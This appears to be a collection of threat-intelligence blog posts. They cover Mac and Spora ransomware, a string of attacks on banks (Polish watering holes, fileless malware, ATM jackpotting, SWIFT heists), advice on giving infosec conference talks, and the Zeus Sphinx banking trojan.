Ransomware Updates

We’ve got some new stuff out there. First, for those who torrent, be careful. If you torrent on a Mac, be very careful.  For the second time, ransomware has been designed for the Mac OS.In this case, “Patcher” is poor quality, shoddy code, to the extent that if the victim pays the ransom, they don’t get their files back because that code doesn’t work. It’s getting dropped via fake Adobe Premier Pro and Microsoft Office for Mac.

Second, if Google is telling you “Hoefler test not found”, don’t think you need to install that font. It’s a ploy on certain compromised websites to drop Spora ransomware. And very few AV or anti-malware programs can detect this one.

spora.JPG But, if you play it safe and do as Google says, click Discard and don’t download.  You’ll avoid ransomware.

If you want to know more, I’ve got a Ransomware page.

And saved the best for last. This amazing map from F-Secure shows the timeline of ransomware.  You can see the explosion that took place in 2016.




Banking on Insecurity

They came for the money, they stayed for the data. There is far more at stake in financial services than dollars and sense. The past twelve months have shown how far attackers are willing and able to go; banks are known for their conservative pace in adopting new strategies, and attackers are literally banking on it.

As the saying goes, “In God we trust”. In banks, maybe not so much.  According to a recent report by Capgemini, one in five bank execs are “highly confident” in their ability to detect a breach, never mind defend themselves against it.  Yet “83% of consumers believe their banks are secure from cyber attack”.  One in four banks report they’ve been attacked, but only 3% of consumers believe their bank has suffered a breach. Never mind the money. How about the data? Survey shows that 71% of banks don’t have a solid security strategy in place, nor do they have adequate data privacy practices. The numbers are not good. Only 40% of banking and insurance companies have automated security intelligence capabilities for proactive threat detection

After following the trail on the SWIFT bank heists last year, I’ve paid close attention to banking malware, threat actors, and points of failure. What worries me is what’s coming as digital payments become the norm, and digital identities take hold in developing nations who lack the infrastructure or regulation to secure or enforce. Given what we already know, what does this recent history of attacks tell us?

Polish Banks
The recent series of targeted malware attacks against Polish banks was identified in January this year, but attackers went after the data, not money. After noticing unusual network activity, like traffic to “exotic” locations and encrypted executables that nobody knew of, and unauthorised files on key machines in the network, several commercial banks confirmed malware infections. Investigations revealed infection stemmed from a tampered JS file from the webserver of the Polish financial sector regulatory body.  This was actually part of a wider campaign that has gone after financial institutions in over 30 countries.  According to researchers from both BAE Systems and Symantec, the malware used in Poland can be linked to similar attacks around the globe, and there are marked similarities to tools used by the cybercrime group Lazarus, although no confirmation has been made.  Targets were led to compromised sites of interest to them, watering holes, which were malicious sites that injected code and directed the targets to a customized exploit kit.  This kit contained exploits against known vulnerabilities in Flash Player and Silverlight. What’s interesting is that the exploits were only activated for certain visitors: those with IP addresses from specific ranges. Per Symantec, “The IP addresses belong to 104 different organizations located in 31 different countries … The vast majority of these organizations are banks, with a small number of telecoms and internet firms on the list.” 15 of these are from the US.  The infection downloaded enables recon on the compromised system. Again, this tool is similar to those used in past by the Lazarus group. Now every major security group has published their opinions and analysis on what was originally all but overlooked as some malware that spread from the regulatory body’s server.

Fileless Malware Attacks
In January of this year, there were reports around the globe of attacks on banks using fileless malware. The malware resided solely in the memory of compromised systems.  This is not signature based malware that can be referenced and detected. According to Kaspersky, 140 enterprises in 40 countries have been hit. And forensics cannot help us:

“ memory forensics is becoming critical to the analysis of malware and its functions. In these particular incidents, the attackers used every conceivable anti-forensic technique; demonstrating how no malware files are needed for the successful exfiltration of data from a network, and how the use of legitimate and open source utilities makes attribution almost impossible.” 

But the infections are hard to identify so that number could well be more.  Further complicating things is the use of legitimate and widely used sysadmin and security tools  like PowerShell, Metasploit and Mimikatz for malware injection. In a range of incidents, the common denominator seems to be embedding PowerShell in the registry to download Meterpreter. From there, the attack is carried out using the native Windows utilities and sysadmin tools. Per Kaspersky:


The new fileless malware hitting banks is Duqu 2.0, which Kaspersky found on it corporate network in 2014, but only after it went undetected for 6 months because it lives almost completely in the memory of the computers. Duqu 2.0 is derived from Stuxnet. The malware renames itself when an infected computer is rebooted so digital forensics has a tough time finding traces. The calling card seems to be the unusual embedding of PowerShell into the registry to download Meterpreter. Duqu 2.0 is derived from Stuxnet. Reports aren’t saying how the malware spreads.

TESCO Bank Attack
In November 2016, Tesco Bank, a British retail bank chain with 7 million customers, warned its customers to watch for suspicious money withdrawals. Unfortunately, when customers who noticed money was missing from their accounts reached out to the bank, many could not get through. Approximately 20,000 accounts were hit. Tesco briefly halted online transactions in response. The attack seemed to stem from a “systemic failure of security around Tesco’s core database”. Recommendations include having controls in place to alert on changes to key files and configurations. As well, file monitoring integrity and Configuration Management Security ensure that if and when changes are made, they are valid and validated.

Take the Money and Run:  COBALT, ATMs and ‘Jackpotting’
There was a distinct rise in ATM attacks over 2016.  The latest siege, Cobalt, covers a wide swath across the UK, Spain, Russia, Romania, the Netherlands, much of Eastern Europe and Malaysia.  According to Group IB researchers, a large number of machines are attacked at once, and Cobalt appears to be linked to cybercrime syndicate Buhtrap.  The malware used causes infected machines to spit out cash in an attacks known as “jackpotting”.  Noteworthy is how this is being described as “the new model of organized crime”.  The FBI issued warnings to US banks following those ATM heists, taking into account the attacks in Taiwan and Thailand, when thieves grabbed over 260,000 pounds from Thailand’s Government savings bank and $2.5 million from Taiwan. The world’s two largest ATM manufacturers, NCR and Diebold Nixdorf, worked to manage the threat.

Lloyd’s Bank Hit by DDoS Attack
In January the venerable Lloyd’s Bank of London was struck by a DDoS attack that lasted two days.  Attackers tried to crash the Lloyd’s site, causing issues for customers and impacting some access to online banking.  The bank did not lose money, nor data, nor was the impact significant.  Law enforcement is investigating.

Attacks on Banks in the SWIFT System
Banks rely on messenger systems to conduct transfers back and forth. In 2016, a series of targeted attacks on banks in the trusted SWIFT messenger system came to light after a massive heist on the Bank of Bangladesh. Apparently the attacks are evolving, and SWIFT has told member bank, in an undisclosed letter from Nov. 2, that “attacks on its systems have only become more sophisticated in their strategies”.  “The threat is very persistent, adaptive and sophisticated – and it is here to stay”.  This is despite the work by regulators globally to toughen bank security measures. And the word is that “a fifth of them are hitting paydirt for the attackers”, per Stephen Gilderdale, head of SWIFT’s Customer Security Programme. Now the hackers exploit tech support software to gain access. Then send victims phony payment instructions via SWIFT network.  SWIFT emphasizes that all those attacks detected “exploited SWIFT interfaces used by its customers” but that the SWIFT communications network itself was not impacted. In light of this, warnings are being issued to small businesses to realize the threat to them is real.  Scams have become more sophisticated and will continue to evolve. 


https://baesystemsai.blogspot.sk/2017/02/lazarus-watering-hole-attacks.html   https://threatpost.com/fileless-memory-based-malware-plagues-140-banks-enterprises/123652/
http://www.welivesecurity.com/2017/02/16/demystifying-targeted-malware-used-polish-banks/?utm_source=organic%20twitter&utm_medium=news&utm_campaign=WLS   http://economictimes.indiatimes.com/industry/banking/finance/banking/indian-banks-are-waking-up-to-a-new-kind-of-cyber-attack/articleshow/56575808.cms

How to Give a Talk in InfoSec

We all needed this page at one point. Or more. I know I did and thank you to the people in our community who had stuff like this for me to find. My turn to pay it forward 😊

“Do that thing which scares you”

I know. It seems so difficult. Feels so scary. But the best advice I can give you as you start out is this:  give a talk. And CFP or Call for Presentations season is now in full swing, meaning deadlines and duedates need to be tracked. Deadlines can be 5 months before the Conference takes place. Don’t let this opportunity pass you by.

You may be able to start small, with a local meetup group. Someplace you feel comfortable, where you can talk for 20 minutes or more, on something you are excited to share and would love to explain.

Why talk? Why not just write or post? Well, a talk is more than just words on a screen. We get to see and hear your passion, which elevates your concept to another level. And we get to see – you! In a community of introverts, facetime is powerful. We love to learn by watching videos of talks given. Like yours. The other plus is that you get to attend a Con, which if you have read any of my posts, is both incentive and reward.

Where to even begin? Here. So relax and just start by reading to see what it is all about. There are people to reach out to in our community if you want to do this, like me. I am happy to be of help. @3ncr1pt3d on twitter :).

Watch the vidoes of past presenters from where you want to speak. Or those who talk about what you want to talk about. Know what has already been covered so you can bring something new. Or get a sense of what is trending. Plus, you can see how people deliver a talk. How slidedecks are put together. What humour works. An incredible resource is this site: http://www.irongeek.com . Adrian Crenshaw records talks at so many conferences. You’ll find whatever you need here.

Here are some terrific online resources to guide you:

https://thesweetkat.com/blog/.  Kat Sweet has both given talks and evaluated them. Trust her. She is friendly, so smart, and very good at talks. Great starting place.
https://danielmiessler.com/blog/build-successful-infosec-career/#cfp. What you need to know about putting together a good talk. It starts with an idea that develops far beyond words on a page. You want to make sure you knkw about format, deadlines, requirements etc.
https://defcon.org/html/links/dc-speakerscorner.html#nikita-cfp. Now you are ready to hear the hard truth. Let’s make that paper stand out in a sea of submissions. You can be among the chosen, but only if you make your talk worthy.

https://www.helpnetsecurity.com/2016/03/30/how-to-get-your-talk-accepted-at-black-hat/  And then there is Black Hat.  Why not aim high? Here are some suggestions to help you get noticed from one of the top-tier conferences, and Stefano Zanero, attendee and reviewer.

Is this your first time? Don’t be shy. We all had a first talk. And BSidesLV offers Proving Ground, a fantastic program at the start of their CFP phase to invite new speakers and pair them with a mentor. I know. That is how I started and it was amazing. Even better are the relationships you build here which carry forward, along with the learning. Because InfoSec is a community and our strength is in our people. Take a look here: https://bsideslv.org

Okay. Pep talk. You are good enough, smart enough and one of us. We want to hear what you have to say and we are willing to help you do it. Go for it!

You can find this under Learning

Recent Polish Bank Attacks. Where There’s Smoke …

Last week I tracked a story about attacks on Polish banks. What was interesting was that attackers came for the data, not the money. As well, the attack itself was described as sophisticated. Those reporting the story were concerned, and remarked that this was one of the most serious cyber attacks on banks Poland had suffered.

We know that cybercrime is actually one of the most efficient business models there is. The attackers have refined their tactics and techniques to maximize gain and minimize effort. Sophisticated involves time, money and effort – the purvue of nationstates usually, and the realm of APTs or Advanced Persistent Threats, like Stuxnet.

In this case, several polish banks  reported they noticed  unusual network activity, like traffic to “exotic” locations and encrypted executables that nobody knew of,  and unauthorised files on key machines in the network. Further investigation confirmed malware infections.The attack was not a quick hit and run but sophisticated, gaining control over critical servers in the bank’s infrastructure:

“the malware used in this attack has not been documented before. It uses some commercial packers and multiple obfuscation methods, has multiple stages, relies on encryption and at the moment of initial analysis was not recognised by available AV solutions.  The final payload has the functionality of a regular RAT”

As of last Thursday, when I shared what I found, there was a suspicion  infection stemmed from a tampered JS file from the webserver of the Polish financial sector regulatory body. today, it was confirmed.  The site of the regulator for Polish banks was indeed contaminated with malware by some foreign source. The malware was responsible for data exfiltration, reconnaissance, and other undesirable activities.  This is why we need to be paying close attention to what comes next:

This particular malware appears to be a new strain of nasty software which has never seen before in live attacks and has a zero detection rate on VirusTotal.

There is no confirmation as to who is responsible, or what data was taken. One year ago, Polish banks were hit by Goznym, in a series of targeted attacks. While this isn’t Goznym, we should be looking for patterns and ties. This serves are a major heads up. What are we seeing? Where aren’t we looking?




My Approach to Threat Intel

In my role at work as a Threat Intel analyst, I track developments using various media feeds, and put together a succinct daily report of several key items that are pertinent to our clients and business lines.  Of course, I share my findings on Twitter and LinkedIn because that’s how the security community flourishes: collaboration. And to say I love what I do would be an understatement.

I don’t pretend to be an expert at what I do, nor will I say I have the definitive definition of what Threat Intel is. There is so much information to capture and analyze, and the learning is continuous. For me, my love of threat intel is in the hunt: looking for trends, patterns, new developments, things that reappear.  If you seek, you will find. There are many ways to search, and I am always trying to learn from people who have been doing this longer. It’s like fine-tuning a guitar, so I’ll always be looking at how to improve what I do.

I have go-to sources I read regularly, people online I follow specifically. My twitter feed is huge and categorized. But if I want to know something right away, it’s usually on there. I also have other sources to check in with directly. I collate information on malware, Advanced Persistent Threats (my most favourite things), specialized systems and their unique vulnerabilities.  This has helped me develop a baseline understanding over the time I’ve been doing this, so that I can understand who the players are when it comes to exploit kits, ransomware or DDoS.  And I try to make sure I know who the experts are, so that when they find something I am paying attention. That’s the head’s up.

When I’ve talked on Blue Teaming with my awesome pal, Haydn Johnson, we refer to the importance of knowing your baseline, watching patterns, so that you can identify anomalies. Those are your threats. That is your head’s up.  I find the same thing here as I track tweets, stories, advisories, reports and blogs.  I look for evolutions in how malware is delivered, so changes in exploit kits, or for kits to disappear from site. That means those kits are going to reappear with a new twist that our standard levels of detection and protection may not recognize, so attackers can access systems. Or, it could mean a larger scale attack, like Carbanak, when a massive crime gang operates on a global level and banks get taken for $1 billion. I play a lot of “what if” because I find I need to think beyond the normal realm to expect the unexpected. After all, the attackers are going where we aren’t looking.

In the weeks to come, I will be trying to bring in more information to widen my search. I’m researching all I can on what experts think best defines Threat Intel and Hunting. Because to really capture what’s out there, we need to broaden our scope.  I want to be looking ahead of the curve in this chase, anticipating their next move based on the wealth of information we have at hand, and factoring in what we know about human behavior. Next gen tech has spawned next gen threats, and as always, the attackers are ahead of us. And here is the thrill of the hunt.

Update: Zeus Sphinx Trojan is back

Exploit. Angler. Nuclear. Doesn’t matter what they’re called, they always deliver.  We should be prepared for the fact that these die down then reappear, with renewed code and vigor.  Here’s a current representation of strains. And to that we add Zeus Sphinx.


As banking malware goes, Sphinx  “combined elaborate fraud tactics to steal credentials and one-time passwords”. Sphinx was originally identified in 2015, but the Brazilian variant appeared hot on the heels of Zeus Panda in Aug 2016,  attacking Brazilian banks, specifically the online banking and Boleto payment systems (Boleto fraud is highly lucrative and deserves its own post). That this occurred at the same time as the Olympics is no coincidence.  Activity died down until recently. IBM X-Force has identified new, targeted attacks against online users of banks and especially credit unions in Canada and Australia. In this article written by malware hunter Limor Kessem, these are “low-volume testing, not full-blown infection campaigns. The malware’s operators appear to be looking very carefully to determine which geographies offer the paths of least resistance.” According to X-Force, the attackers are using the same attack servers that facilitated the Zeus Citadel and Ramnit attacks in 2016. As well, the webinjections share similar code patterns with other banking Trojans. Sphinx uses two distribution methods: email loaded with a malicious VBA loader, and malvertising.


Note how Credit Unions are the major target, as they apparently are low-hanging fruit from a security standpoint.  For Australia, the mix is 40 major banks, credit unions and payment providers. NOTE: This also targets some US banks.


Per the X-Force Exchange site:

Zeus Sphinx is used for the theft of online banking authentication elements such as user credentials, cookies and certificates. These elements are subsequently used by fraudsters in illicit online transactions typically performed from the user’s own device. Connection to the endpoint is facilitated via backconnect hidden virtual network computing (VNC), which means the infected endpoint will initiate a remote-access connection to the criminal’s endpoint. This feature allows the attacker to gain user-grade access to the device even through firewall protection.